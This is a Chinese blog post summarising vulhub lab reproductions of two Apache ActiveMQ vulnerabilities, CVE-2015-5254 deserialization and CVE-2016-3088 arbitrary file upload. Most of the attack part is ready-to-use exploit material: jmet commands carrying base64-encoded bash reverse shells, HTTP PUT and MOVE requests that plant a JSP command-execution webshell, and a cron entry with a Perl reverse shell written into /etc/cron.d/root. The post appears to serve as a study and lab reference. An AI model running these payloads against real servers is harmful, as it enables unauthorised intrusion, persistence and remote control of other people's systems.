【vulhub】ActiveMQ系列漏洞汇总【精华总结】

最新推荐文章于 2024-04-30 00:10:35 发布
最新推荐文章于 2024-04-30 00:10:35 发布
阅读量757 收藏
点赞数
分类专栏: vulhub 文章标签: activeMQ
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/119136407
版权

楼主这次有点急,这次只做总结,详细过程请看末尾参考。

ActiveMQ 反序列化漏洞 CVE-2015-5254

总结:执行payload,然后点击消息,触发payload。
这里放一下我用过的命令

nmap -sS -T5 -n -p- 192.168.100.23


java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.100.23 61616


http://192.168.100.23:8161/admin/browse.jsp?JMSDestination=event


bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4yMy80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4yMy80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.100.23 61616


echo "bash -i >& /dev/tcp/192.168.100.23/5555 0>&1" > /tmp/shell.sh && bash /tmp/shell.sh

bash -c {echo,ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4yMy81NTU1IDA+JjEiID4gL3RtcC9zaGVsbC5zaCAmJiBiYXNoIC90bXAvc2hlbGwuc2g=}|{base64,-d}|{bash,-i}

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4yMy81NTU1IDA+JjEiID4gL3RtcC9zaGVsbC5zaCAmJiBiYXNoIC90bXAvc2hlbGwuc2g=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.100.23 61616

一、命令执行创建文件

在这里插入图片描述

此时,会给目标ActiveMQ添加一个名为event的队列,可以通过 http://192.168.100.23:8161/admin/browse.jsp?JMSDestination=event 看到这个队列的所有消息

在这里插入图片描述
在这里插入图片描述

二、反弹shell

在这里插入图片描述
点击消息我就不放了,直接放反弹的shell
在这里插入图片描述

三、命令执行sh脚本,然后反弹shell

在这里插入图片描述

此时,会给目标ActiveMQ添加一个名为event的队列,可以通过 http://192.168.100.23:8161/admin/browse.jsp?JMSDestination=event 看到这个队列的所有消息

在这里插入图片描述

在这里插入图片描述

ActiveMQ 任意文件上传漏洞 CVE-2016-3088

一、通过fileserver和activeMQ绝对路径写入shell

MOVE包

MOVE /fileserver/test1.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/test2.jsp
Host: 192.168.100.23:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0

在这里插入图片描述
连接失败
在这里插入图片描述
换个马
这里我是看的这篇文章,ActiveMQ任意文件写入漏洞(CVE-2016-3088)

PS:这里注意最好是从原网页访问抓包,只修改前两行

<%@ page import="java.io.*"%>
<%
 out.print("Hello</br>");
 String strcmd=request.getParameter("cmd");
 String line=null;
 Process p=Runtime.getRuntime().exec(strcmd);
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
 while((line=br.readLine())!=null){
 out.print(line+"</br>");
 }
%>

成功!
在这里插入图片描述

二、写入计划任务(这个方法需要ActiveMQ是root运行,否则也不能写入cron文件。)

这是一个比较稳健的方法。首先上传cron配置文件(注意,换行一定要\n,不能是\r\n,否则crontab执行会失败):
PUT包

PUT /fileserver/1.txt HTTP/1.1
Host: 192.168.100.23:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 249

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="192.168.100.23";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

MOVE包

MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///etc/cron.d/root
Host: 192.168.100.23:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0

在这里插入图片描述

三、写入jetty.xml或jar

看原文吧,都是理论和原理

参考:ActiveMQ系列漏洞汇总

樱浅沐冰
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ActiveMQ漏洞总结
看不尽的尘埃——博客
02-11 1万+
目录 ActiveMQ 攻击方式 寻找目标 弱口令 未授权访问 源代码泄露 XSS漏洞 远程代码执行漏洞 反序列化漏洞 ActiveMQ Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。随着中间件的启动,会打开两个端口,61616是工作端口,消息在这个端口进行传...
ActiveMQ学习总结
02-24
1.在网络通讯中,Http请求默认采用同步请求方式,基于请求与响应模式2....目前使用较多的消息队列有ActiveMQ,RabbitMQ,ZeroMQ,Kafka,MetaMQ,RocketMQ实现方式:面向消息的中间件(MessageOrlentedMiddlewareMO
ActiveMQ 信息泄漏漏洞(CVE-2017-15709)
weixin_44047654的博客
11-25 2787
ActiveMQ 信息泄漏漏洞(CVE-2017-15709)
ActiveMQ 反序列化漏洞(CVE-2015-5254)
The code way of kinnisoy
10-24 1985
ActiveMQ 反序列化漏洞(CVE-2015-5254)
ActiveMQ 反序列化漏洞 (CVE-2015-5254)
最新发布
m0_74402888的博客
04-30 1280
1.在IDEA中建立好了SpringBoot项目,并配置好了docker容器,然后在执行Dockerfile时出现以下问题Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting head..._registry-1.docker.io。其中61616端口是工作端口,消息在这个端口上传递;
ActiveMQ系列漏洞汇总
热门推荐
AaronLuo
06-06 1万+
ActiveMQ 反序列化漏洞(CVE-2015-5254) Apache ActiveMQ是美国Apache软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring FrameWork。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。 信息搜集 nmap -sS -T5 -n
activemq的几种基本通信方式总结
02-02
这里,我们先针对具体的一个消息队列Activemq的基本通信方式进行探讨。activemq是JMS消息通信规范的一个实现。总的来说,消息规范里面定义最常见的几种消息通信模式主要有发布-订阅、点对点这两种。另外,通过结合...
一头扎进JMS之ActiveMQ系列
10-29
在这个“一头扎进JMS之ActiveMQ系列”中,我们将深入探讨这个流行的开源消息代理——ActiveMQ,它是Apache软件基金会的项目,广泛应用于各种企业级应用。 ActiveMQ作为JMS的实现,提供了多种协议支持,包括开放标准...
ActiveMQ 反序列化漏洞(CVE-2015-5254)
weixin_44047654的博客
11-23 470
ActiveMQ 反序列化漏洞(CVE-2015-5254)
ActiveMQ 漏洞
per_se_veran_ce的博客
12-30 459
环境:docker ActiveMQ Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 背景简介 ActiveMQ Web控制台分为三个应用程序:admin,ap
ActiveMQ 反序列化漏洞 (CVE-2015-5254)复现
qq_45314073的博客
09-16 1481
ActiveMQ 反序列化漏洞
vulhub漏洞——ActiveMQ
weixin_45808483的博客
12-07 744
访问 3128 端口 Goby扫描资产
Vluhub漏洞ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)
FryhRx的博客
04-05 4775
Vluhub漏洞ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)
红队攻防之ActiveMQ漏洞集锦
自强不息
12-07 885
要么拼命,要么滚回去
vulhub靶场漏洞复现——ActiveMQ
pigzlfa的博客
09-14 282
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。ActiveMQ详解文章链接——消息中间件ActiveMQ链接web管理端口工作(消息传递)端口816161616。
悬镜安全强烈推荐丨内网安全检查/渗透总结,先收藏再说
Anprou的博客
07-06 6354
浏览文章的时候,能够看到一篇干货满满的文章,实属不易,能够把内网安全渗透测试的整个阶段所涉及到的信息整理的如何全面也是值得佩服,废话不多说,直接上文章。本篇文章首发平台先知社区,如需转载,请标注来源。阅读本篇文章大约需要15分钟,建议先收藏,慢慢看。修订记录编号日期修订内容12018.5.18初稿A2B2C2A3B3C31. 内网安全检查/渗透介绍1.1 攻击思路有2种思路:攻击外网服务器,获取外...
Vulhub漏洞复现之Apache解析漏洞总结
来到了学渣的博客
01-30 4033
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 前文: 名字雷同但差个n的两种类型漏洞环境靶机:vulnhubvulhub的区别 Vulhub漏洞复现之Dns域传送漏洞 Vulhub漏洞复现之Django (小于2.0.8)任意url跳转漏洞(CVE-2018-14574) Vulhub漏洞复现之Th...
4、kali下用靶场docker报没权限
weixin_42194536的博客
11-18 448
docker靶场

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值